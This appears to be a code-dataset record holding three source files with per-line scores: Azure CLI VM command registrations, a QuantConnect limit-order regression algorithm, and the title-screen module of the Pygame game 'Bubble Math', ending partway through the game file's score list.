+ _extension_show_transform)\n", "\n", "# VMSS Extension\n", "cli_command(__name__, 'vmss extension delete', custom_path.format('delete_vmss_extension'))\n", "cli_command(__name__, 'vmss extension show', custom_path.format('get_vmss_extension'), exception_handler=empty_on_404)\n", "cli_command(__name__, 'vmss extension set', custom_path.format('set_vmss_extension'))\n", "cli_command(__name__, 'vmss extension list', custom_path.format('list_vmss_extensions'))\n", "\n", "# VM Extension Image\n", "op_var = 'virtual_machine_extension_images_operations'\n", "op_class = 'VirtualMachineExtensionImagesOperations'\n", "cli_command(__name__, 'vm extension image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext_image, exception_handler=empty_on_404)\n", "cli_command(__name__, 'vm extension image list-names', mgmt_path.format(op_var, op_class, 'list_types'), cf_vm_ext_image)\n", "cli_command(__name__, 'vm extension image list-versions', mgmt_path.format(op_var, op_class, 'list_versions'), cf_vm_ext_image)\n", "cli_command(__name__, 'vm extension image list', custom_path.format('list_vm_extension_images'))\n", "\n", "# VMSS Extension Image (convenience copy of VM Extension Image)\n", "cli_command(__name__, 'vmss extension image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_ext_image, exception_handler=empty_on_404)\n", "cli_command(__name__, 'vmss extension image list-names', mgmt_path.format(op_var, op_class, 'list_types'), cf_vm_ext_image)\n", "cli_command(__name__, 'vmss extension image list-versions', mgmt_path.format(op_var, op_class, 'list_versions'), cf_vm_ext_image)\n", "cli_command(__name__, 'vmss extension image list', custom_path.format('list_vm_extension_images'))\n", "\n", "# VM Image\n", "op_var = 'virtual_machine_images_operations'\n", "op_class = 'VirtualMachineImagesOperations'\n", "cli_command(__name__, 'vm image show', mgmt_path.format(op_var, op_class, 'get'), cf_vm_image, exception_handler=empty_on_404)\n", "cli_command(__name__, 'vm 
image list-offers', mgmt_path.format(op_var, op_class, 'list_offers'), cf_vm_image)\n", "cli_command(__name__, 'vm image list-publishers', mgmt_path.format(op_var, op_class, 'list_publishers'), cf_vm_image)\n", "cli_command(__name__, 'vm image list-skus', mgmt_path.format(op_var, op_class, 'list_skus'), cf_vm_image)\n", "cli_command(__name__, 'vm image list', custom_path.format('list_vm_images'))\n", "\n", "# VM Usage\n", "cli_command(__name__, 'vm list-usage', mgmt_path.format('usage_operations', 'UsageOperations', 'list'), cf_usage, transform=transform_vm_usage_list,\n", " table_transformer='[].{Name:localName, CurrentValue:currentValue, Limit:limit}')\n", "\n", "# VMSS\n", "vmss_show_table_transform = '{Name:name, ResourceGroup:resourceGroup, Location:location, Capacity:sku.capacity, Overprovision:overprovision, upgradePolicy:upgradePolicy.mode}'\n", "cli_command(__name__, 'vmss delete', mgmt_path.format('virtual_machine_scale_sets_operations', 'VirtualMachineScaleSetsOperations', 'delete'), cf_vmss, no_wait_param='raw')\n", "cli_command(__name__, 'vmss list-skus', mgmt_path.format('virtual_machine_scale_sets_operations', 'VirtualMachineScaleSetsOperations', 'list_skus'), cf_vmss)\n", "\n", "cli_command(__name__, 'vmss list-instances', mgmt_path.format('virtual_machine_scale_set_vms_operations', 'VirtualMachineScaleSetVMsOperations', 'list'), cf_vmss_vm)\n", "\n", "cli_command(__name__, 'vmss create', custom_path.format('create_vmss'), transform=DeploymentOutputLongRunningOperation('Starting vmss create'), no_wait_param='no_wait', exception_handler=handle_long_running_operation_exception, table_transformer=deployment_validate_table_format)\n", "cli_command(__name__, 'vmss deallocate', custom_path.format('deallocate_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss delete-instances', custom_path.format('delete_vmss_instances'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss get-instance-view', 
custom_path.format('get_vmss_instance_view'),\n", " table_transformer='{ProvisioningState:statuses[0].displayStatus, PowerState:statuses[1].displayStatus}')\n", "cli_command(__name__, 'vmss show', custom_path.format('show_vmss'), exception_handler=empty_on_404,\n", " table_transformer=vmss_show_table_transform)\n", "cli_command(__name__, 'vmss list', custom_path.format('list_vmss'), table_transformer='[].' + vmss_show_table_transform)\n", "cli_command(__name__, 'vmss stop', custom_path.format('stop_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss restart', custom_path.format('restart_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss start', custom_path.format('start_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss update-instances', custom_path.format('update_vmss_instances'), no_wait_param='no_wait')\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " cli_command(__name__, 'vmss reimage', custom_path.format('reimage_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss scale', custom_path.format('scale_vmss'), no_wait_param='no_wait')\n", "cli_command(__name__, 'vmss list-instance-connection-info', custom_path.format('list_vmss_instance_connection_info'))\n", "cli_command(__name__, 'vmss list-instance-public-ips', custom_path.format('list_vmss_instance_public_ips'))\n", "\n", "# VM Size\n", "cli_command(__name__, 'vm list-sizes', mgmt_path.format('virtual_machine_sizes_operations', 'VirtualMachineSizesOperations', 'list'), cf_vm_sizes)\n", "\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " # VM Disk\n", " op_var = 'disks_operations'\n", " op_class = 'DisksOperations'\n", " cli_command(__name__, 'disk create', custom_path.format('create_managed_disk'), no_wait_param='no_wait')\n", " cli_command(__name__, 'disk list', custom_path.format('list_managed_disks'))\n", " cli_command(__name__, 'disk show', mgmt_path.format(op_var, op_class, 
'get'), cf_disks, exception_handler=empty_on_404)\n", " cli_command(__name__, 'disk delete', mgmt_path.format(op_var, op_class, 'delete'), cf_disks, no_wait_param='raw', confirmation=True)\n", " cli_command(__name__, 'disk grant-access', custom_path.format('grant_disk_access'))\n", " cli_command(__name__, 'disk revoke-access', mgmt_path.format(op_var, op_class, 'revoke_access'), cf_disks)\n", " cli_generic_update_command(__name__, 'disk update', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class),\n", " 'azure.mgmt.compute.compute.operations.{}#{}.create_or_update'.format(op_var, op_class),\n", " custom_function_op=custom_path.format('update_managed_disk'),\n", " setter_arg_name='disk', factory=cf_disks, no_wait_param='raw')\n", " cli_generic_wait_command(__name__, 'disk wait', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class), cf_disks)\n", "\n", " op_var = 'snapshots_operations'\n", " op_class = 'SnapshotsOperations'\n", " cli_command(__name__, 'snapshot create', custom_path.format('create_snapshot'))\n", " cli_command(__name__, 'snapshot list', custom_path.format('list_snapshots'))\n", " cli_command(__name__, 'snapshot show', mgmt_path.format(op_var, op_class, 'get'), cf_snapshots, exception_handler=empty_on_404)\n", " cli_command(__name__, 'snapshot delete', mgmt_path.format(op_var, op_class, 'delete'), cf_snapshots)\n", " cli_command(__name__, 'snapshot grant-access', custom_path.format('grant_snapshot_access'))\n", " cli_command(__name__, 'snapshot revoke-access', mgmt_path.format(op_var, op_class, 'revoke_access'), cf_snapshots)\n", " cli_generic_update_command(__name__, 'snapshot update', 'azure.mgmt.compute.compute.operations.{}#{}.get'.format(op_var, op_class),\n", " 'azure.mgmt.compute.compute.operations.{}#{}.create_or_update'.format(op_var, op_class),\n", " custom_function_op=custom_path.format('update_snapshot'),\n", " setter_arg_name='snapshot', factory=cf_snapshots)\n", "\n", "op_var = 
'images_operations'\n", "op_class = 'ImagesOperations'\n", "cli_command(__name__, 'image create', custom_path.format('create_image'))\n", "cli_command(__name__, 'image list', custom_path.format('list_images'))\n", "cli_command(__name__, 'image show', mgmt_path.format(op_var, op_class, 'get'), cf_images, exception_handler=empty_on_404)\n", "cli_command(__name__, 'image delete', mgmt_path.format(op_var, op_class, 'delete'), cf_images)\n", "\n", "if supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2017-03-30'):\n", " cli_command(__name__, 'vm list-skus', custom_path.format('list_skus'), table_transformer=transform_sku_for_table_output)\n", " op_var = 'virtual_machine_run_commands_operations'\n", " op_class = 'VirtualMachineRunCommandsOperations'\n", " cli_command(__name__, 'vm run-command show', mgmt_path.format(op_var, op_class, 'get'), cf_run_commands)\n", " cli_command(__name__, 'vm run-command list', mgmt_path.format(op_var, op_class, 'list'), cf_run_commands)\n", " cli_command(__name__, 'vm run-command invoke', custom_path.format('run_command_invoke'))\n", "\n", "# MSI\n", "cli_command(__name__, 'vm assign-identity', custom_path.format('assign_vm_identity'))\n", "cli_command(__name__, 'vmss assign-identity', custom_path.format('assign_vmss_identity'))\n" ]
[ 0, 0, 0.010526315789473684, 0, 0, 0, 0, 0.011627906976744186, 0, 0.01020408163265306, 0, 0.010526315789473684, 0.011627906976744186, 0.011627906976744186, 0, 0.01, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.007142857142857143, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0, 0.009615384615384616, 0, 0, 0, 0, 0.010526315789473684, 0.012345679012345678, 0, 0, 0, 0, 0.011111111111111112, 0, 0, 0, 0, 0, 0, 0, 0, 0.004132231404958678, 0.0078125, 0.008547008547008548, 0.008547008547008548, 0.0078125, 0.00847457627118644, 0.00909090909090909, 0.009009009009009009, 0.009345794392523364, 0.008849557522123894, 0.007751937984496124, 0.011494252873563218, 0.0055248618784530384, 0.009900990099009901, 0.010752688172043012, 0, 0, 0.011627906976744186, 0, 0, 0.012048192771084338, 0, 0, 0.009708737864077669, 0, 0.012048192771084338, 0.009009009009009009, 0, 0, 0.009523809523809525, 0.009433962264150943, 0.006666666666666667, 0, 0, 0, 0.008849557522123894, 0.008771929824561403, 0.006329113924050633, 0, 0, 0, 0, 0, 0.009615384615384616, 0, 0, 0, 0.0053475935828877, 0.005050505050505051, 0.004608294930875576, 0, 0, 0.010309278350515464, 0.01, 0.009345794392523364, 0, 0, 0.0044444444444444444, 0, 0, 0, 0.008928571428571428, 0.007194244604316547, 0.009259259259259259, 0.007692307692307693, 0.012048192771084338, 0.009009009009009009, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009900990099009901, 0.010101010101010102, 0.010638297872340425, 0, 0, 0.010752688172043012, 0.008264462809917356, 0, 0, 0.01, 0.008130081300813009, 0, 0, 0.010869565217391304, 0.011904761904761904, 0, 0, 0.00980392156862745, 0.01098901098901099, 0, 0.01, 0.011111111111111112, 0.010869565217391304, 0, 0, 0, 0, 0.00980392156862745, 0.005649717514124294, 0.007751937984496124, 0, 0, 0.012195121951219513, 0, 0, 0, 0.010869565217391304, 0.008403361344537815, 
0.011627906976744186, 0.011235955056179775, 0, 0, 0, 0, 0.0070921985815602835, 0.00819672131147541, 0.0078125, 0.010309278350515464, 0, 0, 0.006993006993006993, 0.008064516129032258, 0.007692307692307693, 0.010101010101010102, 0, 0, 0, 0, 0.007874015748031496, 0.00909090909090909, 0.00847457627118644, 0.009433962264150943, 0, 0, 0, 0.006711409395973154, 0.010752688172043012, 0, 0, 0.005681818181818182, 0.005780346820809248, 0.006329113924050633, 0, 0.006024096385542169, 0, 0.0035714285714285713, 0.009523809523809525, 0.008547008547008548, 0.010638297872340425, 0.008547008547008548, 0.01, 0, 0.008264462809917356, 0.010752688172043012, 0.010101010101010102, 0.010526315789473684, 0.008547008547008548, 0, 0.009708737864077669, 0.010526315789473684, 0.00847457627118644, 0.009259259259259259, 0, 0, 0.006802721088435374, 0, 0, 0, 0, 0, 0.009174311926605505, 0.012345679012345678, 0.008064516129032258, 0.0072992700729927005, 0.011363636363636364, 0.009009009009009009, 0.007575757575757576, 0.008333333333333333, 0.010752688172043012, 0.010638297872340425, 0.007246376811594203, 0, 0, 0, 0.011904761904761904, 0.012345679012345678, 0.007575757575757576, 0.009523809523809525, 0.010416666666666666, 0.008403361344537815, 0.007352941176470588, 0.008333333333333333, 0.011235955056179775, 0.012345679012345678, 0, 0, 0, 0, 0, 0.00819672131147541, 0.010526315789473684, 0, 0, 0.008, 0, 0, 0.009174311926605505, 0.00909090909090909, 0.010752688172043012, 0, 0, 0.011627906976744186, 0.011111111111111112 ]
332
0.003848
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System") AddReference("QuantConnect.Algorithm") AddReference("QuantConnect.Common") from System import * from QuantConnect import * from QuantConnect.Algorithm import * from datetime import timedelta ### <summary> ### Basic template algorithm simply initializes the date range and cash ### </summary> ### <meta name="tag" content="trading and orders" /> ### <meta name="tag" content="limit orders" /> ### <meta name="tag" content="placing orders" /> ### <meta name="tag" content="updating orders" /> ### <meta name="tag" content="regression test" /> class LimitFillRegressionAlgorithm(QCAlgorithm): def Initialize(self): '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.''' self.SetStartDate(2013,10,7) #Set Start Date self.SetEndDate(2013,10,11) #Set End Date self.SetCash(100000) #Set Strategy Cash # Find more symbols here: http://quantconnect.com/data self.AddEquity("SPY", Resolution.Second) def OnData(self, data): '''OnData event is the primary entry point for your algorithm. 
Each new data point will be pumped in here.''' if data.ContainsKey("SPY"): if self.IsRoundHour(self.Time): negative = 1 if self.Time < (self.StartDate + timedelta(days=2)) else -1 self.LimitOrder("SPY", negative*10, data["SPY"].Price) def IsRoundHour(self, dateTime): '''Verify whether datetime is round hour''' return dateTime.minute == 0 and dateTime.second == 0 def OnOrderEvent(self, orderEvent): self.Debug(str(orderEvent))
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "AddReference(\"QuantConnect.Common\")\n", "\n", "from System import *\n", "from QuantConnect import *\n", "from QuantConnect.Algorithm import *\n", "from datetime import timedelta\n", "\n", "### <summary>\n", "### Basic template algorithm simply initializes the date range and cash\n", "### </summary>\n", "### <meta name=\"tag\" content=\"trading and orders\" />\n", "### <meta name=\"tag\" content=\"limit orders\" />\n", "### <meta name=\"tag\" content=\"placing orders\" />\n", "### <meta name=\"tag\" content=\"updating orders\" />\n", "### <meta name=\"tag\" content=\"regression test\" />\n", "class LimitFillRegressionAlgorithm(QCAlgorithm):\n", "\n", " def Initialize(self):\n", " '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. 
All algorithms must initialized.'''\n", "\n", " self.SetStartDate(2013,10,7) #Set Start Date\n", " self.SetEndDate(2013,10,11) #Set End Date\n", " self.SetCash(100000) #Set Strategy Cash\n", " # Find more symbols here: http://quantconnect.com/data\n", " self.AddEquity(\"SPY\", Resolution.Second)\n", "\n", " def OnData(self, data):\n", " '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.'''\n", " if data.ContainsKey(\"SPY\"):\n", " if self.IsRoundHour(self.Time):\n", " negative = 1 if self.Time < (self.StartDate + timedelta(days=2)) else -1\n", " self.LimitOrder(\"SPY\", negative*10, data[\"SPY\"].Price)\n", "\n", " def IsRoundHour(self, dateTime):\n", " '''Verify whether datetime is round hour'''\n", " return dateTime.minute == 0 and dateTime.second == 0\n", "\n", " def OnOrderEvent(self, orderEvent):\n", " self.Debug(str(orderEvent))\n" ]
[ 0, 0.012345679012345678, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.037037037037037035, 0.02702702702702703, 0.03225806451612903, 0, 0.07142857142857142, 0.013888888888888888, 0.06666666666666667, 0.018867924528301886, 0.02127659574468085, 0.02040816326530612, 0.02, 0.02, 0.02040816326530612, 0, 0, 0.006578947368421052, 0, 0.05555555555555555, 0.05660377358490566, 0.017241379310344827, 0, 0, 0, 0, 0.00847457627118644, 0, 0, 0.011235955056179775, 0, 0, 0, 0, 0, 0, 0, 0 ]
55
0.010849
false
# "Bubble Math" # Developed RL Vision (www.rlvision.com) # Source code licensed under GPLv3 (see LICENSE.txt) # Dev Env: Portable Python 2.7.5.1 (Python2/Windows/Pygame/PyScripter) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Title.py # This module displays the title screen. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # import pygame import os from pygame.locals import * # Bubble Math imports import text import button import util from gameflow import * class Title: """ Displays the title screen """ def __init__(self, game ): self.game = game # load assets try: self.imgTitleBG = pygame.image.load( os.path.join('gfx', 'title.png') ).convert() self.imgButtons = pygame.image.load( os.path.join('gfx', 'buttons.png') ).convert_alpha() self.sfxClick = pygame.mixer.Sound( os.path.join('sfx', 'click.ogg') ) except: self.game.fatalError(self.game.strings["error_title_assets"]) # setup button rectangles self.rectButton1Area = Rect(196 , 419 , 190 , 49) self.rectButton2Area = Rect(420 , 419 , 190 , 49) # setup exit button self.game.buttonHandler.append(button.Button(self.game, (10, 10), self.imgButtons, Rect(0, 0, 26, 26), Rect(32, 0, 26, 26), self.btnExit_Click, self.sfxClick )) # setup mute button btn = button.Button(self.game, (SCREEN_WIDTH-80 , 11), self.imgButtons, Rect(0, 32, 31, 23), Rect(32, 32, 31, 23), self.btnSound_Click, self.sfxClick) btn.setAlternativeSourceImage(Rect(0, 64, 31, 23), Rect(32, 64, 31, 23)) if self.game.audio.muted: btn.toggleSourceImage() self.game.buttonHandler.append(btn) # setup fullscreen button btn = button.Button(self.game, (SCREEN_WIDTH-35 , 10), self.imgButtons, Rect(0, 96, 25, 25), Rect(32, 96, 25, 25), self.btnFullscreen_Click, self.sfxClick) btn.setAlternativeSourceImage(Rect(0, 128, 25, 25), Rect(32, 128, 25, 25)) if self.game.fullscreen: btn.toggleSourceImage() self.game.buttonHandler.append(btn) # setup flag buttons 
self.game.buttonHandler.append(button.Button(self.game, (SCREEN_WIDTH-65, SCREEN_HEIGHT-70 ) , self.imgButtons , Rect(0, 160, 24, 18), Rect(32, 160, 24, 18), self.btnEnglish_Click, self.sfxClick )) # english self.game.buttonHandler.append(button.Button(self.game, (SCREEN_WIDTH-35, SCREEN_HEIGHT-70 ) , self.imgButtons , Rect(0, 192, 24, 18), Rect(32, 192, 24, 18), self.btnSwedish_Click, self.sfxClick )) # swedish # setup start button btn = button.Button(self.game, (SCREEN_WIDTH/2 -95 ,370), self.imgButtons, Rect(0, 224, 191, 49), Rect(0, 288, 191, 49), self.btnStart_Click, self.sfxClick) btn.setText(self.game.strings["new_game"], 16, COLOR_BUTTON_TEXT, 'freesansbold.ttf' ) self.game.buttonHandler.append(btn) # setup help button btn = button.Button(self.game, (SCREEN_WIDTH/2 -95 ,435), self.imgButtons, Rect(0, 224, 191, 49), Rect(0, 288, 191, 49), self.btnHelp_Click, self.sfxClick) btn.setText(self.game.strings["how_to_play"] , 16 , COLOR_BUTTON_TEXT , 'freesansbold.ttf' ) self.game.buttonHandler.append(btn) # setup difficulty button btn = button.Button(self.game, (SCREEN_WIDTH/2 -60 , 500), self.imgButtons, Rect(0, 448, 120, 33), Rect(136, 448, 120, 33), self.btnDifficulty_Click, self.sfxClick) txt = self.game.strings["easy"] if self.game.difficulty == DIFF_MEDIUM: txt = self.game.strings["medium"] if self.game.difficulty == DIFF_HARD: txt = self.game.strings["hard"] btn.setText(txt, 14, COLOR_BUTTON_TEXT, 'freesansbold.ttf') btn.setTextPosition(text.ALIGN_CENTER, 0, -1) self.game.buttonHandler.append(btn) # Button click handlers def btnStart_Click(self, btn): self.game.fadeTo(GM_GAME) def btnHelp_Click(self, btn): self.game.fadeTo(GM_HELP,False) def btnDifficulty_Click(self, btn): if self.game.difficulty == DIFF_EASY: self.game.difficulty = DIFF_MEDIUM elif self.game.difficulty == DIFF_MEDIUM: self.game.difficulty = DIFF_HARD elif self.game.difficulty == DIFF_HARD: self.game.difficulty = DIFF_EASY txt = self.game.strings["easy"] if self.game.difficulty == 
DIFF_MEDIUM: txt = self.game.strings["medium"] if self.game.difficulty == DIFF_HARD: txt = self.game.strings["hard"] btn.setText(txt, 14, COLOR_BUTTON_TEXT, 'freesansbold.ttf') btn.setTextPosition(text.ALIGN_CENTER, 0, -1) def btnExit_Click(self, btn): self.game.fadeTo(GM_QUIT) def btnFullscreen_Click(self, btn): self.game.screen = util.toggle_fullscreen() self.game.fullscreen = not self.game.fullscreen btn.toggleSourceImage() def btnSound_Click(self, btn): self.game.audio.toggleMute() btn.toggleSourceImage() def btnEnglish_Click(self, btn): self.game.fadeTo(GM_TITLE,False) self.game.setLanguage("en") def btnSwedish_Click(self, btn): self.game.fadeTo(GM_TITLE,False) self.game.setLanguage("se") def update(self): pass def draw(self): # draw backdrop & credits text at bottom self.game.screen.blit(self.imgTitleBG, (0, 0)) text.drawText(self.game.screen, self.game.strings["credits"], SCREEN_WIDTH / 2, SCREEN_HEIGHT - 16, 13, (11, 85, 114), 'freesansbold.ttf', text.ALIGN_CENTER)
[ "# \"Bubble Math\"\n", "# Developed RL Vision (www.rlvision.com)\n", "# Source code licensed under GPLv3 (see LICENSE.txt)\n", "# Dev Env: Portable Python 2.7.5.1 (Python2/Windows/Pygame/PyScripter)\n", "# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n", "# Title.py\n", "# This module displays the title screen.\n", "# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n", "\n", "import pygame\n", "import os\n", "from pygame.locals import *\n", "\n", "# Bubble Math imports\n", "import text\n", "import button\n", "import util\n", "from gameflow import *\n", "\n", "\n", "class Title:\n", "\t\"\"\" Displays the title screen \"\"\"\n", "\n", "\tdef __init__(self, game ):\n", "\n", "\t\tself.game = game\n", "\n", "\t\t# load assets\n", "\t\ttry:\n", "\t\t\tself.imgTitleBG = pygame.image.load( os.path.join('gfx', 'title.png') ).convert()\n", "\t\t\tself.imgButtons = pygame.image.load( os.path.join('gfx', 'buttons.png') ).convert_alpha()\n", "\t\t\tself.sfxClick = pygame.mixer.Sound( os.path.join('sfx', 'click.ogg') )\n", "\t\texcept:\n", "\t\t\tself.game.fatalError(self.game.strings[\"error_title_assets\"])\n", "\n", "\t\t# setup button rectangles\n", "\t\tself.rectButton1Area = Rect(196 , 419 , 190 , 49)\n", "\t\tself.rectButton2Area = Rect(420 , 419 , 190 , 49)\n", "\n", " # setup exit button\n", "\t\tself.game.buttonHandler.append(button.Button(self.game, (10, 10), self.imgButtons, Rect(0, 0, 26, 26), Rect(32, 0, 26, 26), self.btnExit_Click, self.sfxClick ))\n", "\n", " # setup mute button\n", "\t\tbtn = button.Button(self.game, (SCREEN_WIDTH-80 , 11), self.imgButtons, Rect(0, 32, 31, 23), Rect(32, 32, 31, 23), self.btnSound_Click, self.sfxClick)\n", "\t\tbtn.setAlternativeSourceImage(Rect(0, 64, 31, 23), Rect(32, 64, 31, 23))\n", "\t\tif self.game.audio.muted: btn.toggleSourceImage()\n", "\t\tself.game.buttonHandler.append(btn)\n", "\n", " # setup fullscreen button\n", "\t\tbtn = button.Button(self.game, 
(SCREEN_WIDTH-35 , 10), self.imgButtons, Rect(0, 96, 25, 25), Rect(32, 96, 25, 25), self.btnFullscreen_Click, self.sfxClick)\n", "\t\tbtn.setAlternativeSourceImage(Rect(0, 128, 25, 25), Rect(32, 128, 25, 25))\n", "\t\tif self.game.fullscreen: btn.toggleSourceImage()\n", "\t\tself.game.buttonHandler.append(btn)\n", "\n", "\t\t# setup flag buttons\n", "\t\tself.game.buttonHandler.append(button.Button(self.game, (SCREEN_WIDTH-65, SCREEN_HEIGHT-70 ) , self.imgButtons , Rect(0, 160, 24, 18), Rect(32, 160, 24, 18), self.btnEnglish_Click, self.sfxClick )) \t# english\n", "\t\tself.game.buttonHandler.append(button.Button(self.game, (SCREEN_WIDTH-35, SCREEN_HEIGHT-70 ) , self.imgButtons , Rect(0, 192, 24, 18), Rect(32, 192, 24, 18), self.btnSwedish_Click, self.sfxClick )) \t# swedish\n", "\n", "\t\t# setup start button\n", "\t\tbtn = button.Button(self.game, (SCREEN_WIDTH/2 -95 ,370), self.imgButtons, Rect(0, 224, 191, 49), Rect(0, 288, 191, 49), self.btnStart_Click, self.sfxClick)\n", "\t\tbtn.setText(self.game.strings[\"new_game\"], 16, COLOR_BUTTON_TEXT, 'freesansbold.ttf' )\n", "\t\tself.game.buttonHandler.append(btn)\n", "\n", "\t\t# setup help button\n", "\t\tbtn = button.Button(self.game, (SCREEN_WIDTH/2 -95 ,435), self.imgButtons, Rect(0, 224, 191, 49), Rect(0, 288, 191, 49), self.btnHelp_Click, self.sfxClick)\n", "\t\tbtn.setText(self.game.strings[\"how_to_play\"] , 16 , COLOR_BUTTON_TEXT , 'freesansbold.ttf' )\n", "\t\tself.game.buttonHandler.append(btn)\n", "\n", "\t\t# setup difficulty button\n", "\t\tbtn = button.Button(self.game, (SCREEN_WIDTH/2 -60 , 500), self.imgButtons, Rect(0, 448, 120, 33), Rect(136, 448, 120, 33), self.btnDifficulty_Click, self.sfxClick)\n", "\t\ttxt = self.game.strings[\"easy\"]\n", "\t\tif self.game.difficulty == DIFF_MEDIUM: txt = self.game.strings[\"medium\"]\n", "\t\tif self.game.difficulty == DIFF_HARD: txt = self.game.strings[\"hard\"]\n", "\t\tbtn.setText(txt, 14, COLOR_BUTTON_TEXT, 'freesansbold.ttf')\n", 
"\t\tbtn.setTextPosition(text.ALIGN_CENTER, 0, -1)\n", "\t\tself.game.buttonHandler.append(btn)\n", "\n", "\n", "\t# Button click handlers\n", "\n", "\tdef btnStart_Click(self, btn):\n", "\t\tself.game.fadeTo(GM_GAME)\n", "\n", "\tdef btnHelp_Click(self, btn):\n", "\t\tself.game.fadeTo(GM_HELP,False)\n", "\n", "\tdef btnDifficulty_Click(self, btn):\n", "\t\tif self.game.difficulty == DIFF_EASY: self.game.difficulty = DIFF_MEDIUM\n", "\t\telif self.game.difficulty == DIFF_MEDIUM: self.game.difficulty = DIFF_HARD\n", "\t\telif self.game.difficulty == DIFF_HARD: self.game.difficulty = DIFF_EASY\n", "\n", "\t\ttxt = self.game.strings[\"easy\"]\n", "\t\tif self.game.difficulty == DIFF_MEDIUM: txt = self.game.strings[\"medium\"]\n", "\t\tif self.game.difficulty == DIFF_HARD: txt = self.game.strings[\"hard\"]\n", "\t\tbtn.setText(txt, 14, COLOR_BUTTON_TEXT, 'freesansbold.ttf')\n", "\t\tbtn.setTextPosition(text.ALIGN_CENTER, 0, -1)\n", "\n", "\tdef btnExit_Click(self, btn):\n", "\t\tself.game.fadeTo(GM_QUIT)\n", "\n", "\tdef btnFullscreen_Click(self, btn):\n", "\t\tself.game.screen = util.toggle_fullscreen()\n", "\t\tself.game.fullscreen = not self.game.fullscreen\n", "\t\tbtn.toggleSourceImage()\n", "\n", "\tdef btnSound_Click(self, btn):\n", "\t\tself.game.audio.toggleMute()\n", "\t\tbtn.toggleSourceImage()\n", "\n", "\tdef btnEnglish_Click(self, btn):\n", "\t\tself.game.fadeTo(GM_TITLE,False)\n", "\t\tself.game.setLanguage(\"en\")\n", "\n", "\tdef btnSwedish_Click(self, btn):\n", "\t\tself.game.fadeTo(GM_TITLE,False)\n", "\t\tself.game.setLanguage(\"se\")\n", "\n", "\n", "\tdef update(self):\n", "\t\tpass\n", "\n", "\tdef draw(self):\n", "\t\t# draw backdrop & credits text at bottom\n", "\t\tself.game.screen.blit(self.imgTitleBG, (0, 0))\n", "\t\ttext.drawText(self.game.screen, self.game.strings[\"credits\"], SCREEN_WIDTH / 2, SCREEN_HEIGHT - 16, 13, (11, 85, 114), 'freesansbold.ttf', text.ALIGN_CENTER)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0, 0.07142857142857142, 0, 0.05263157894736842, 0, 0.0625, 0.14285714285714285, 0.047058823529411764, 0.043010752688172046, 0.04054054054054054, 0.2, 0.015384615384615385, 0, 0.03571428571428571, 0.07692307692307693, 0.07692307692307693, 0, 0.03571428571428571, 0.024539877300613498, 0, 0.03571428571428571, 0.026143790849673203, 0.013333333333333334, 0.038461538461538464, 0.02631578947368421, 0, 0.029411764705882353, 0.02531645569620253, 0.012987012987012988, 0.0392156862745098, 0.02631578947368421, 0, 0.043478260869565216, 0.02843601895734597, 0.02830188679245283, 0, 0.043478260869565216, 0.031446540880503145, 0.033707865168539325, 0.02631578947368421, 0, 0.045454545454545456, 0.03164556962025317, 0.06315789473684211, 0.02631578947368421, 0, 0.03571428571428571, 0.023952095808383235, 0.029411764705882353, 0.02631578947368421, 0.027777777777777776, 0.016129032258064516, 0.020833333333333332, 0.02631578947368421, 0, 0, 0.08, 0, 0.0625, 0.03571428571428571, 0, 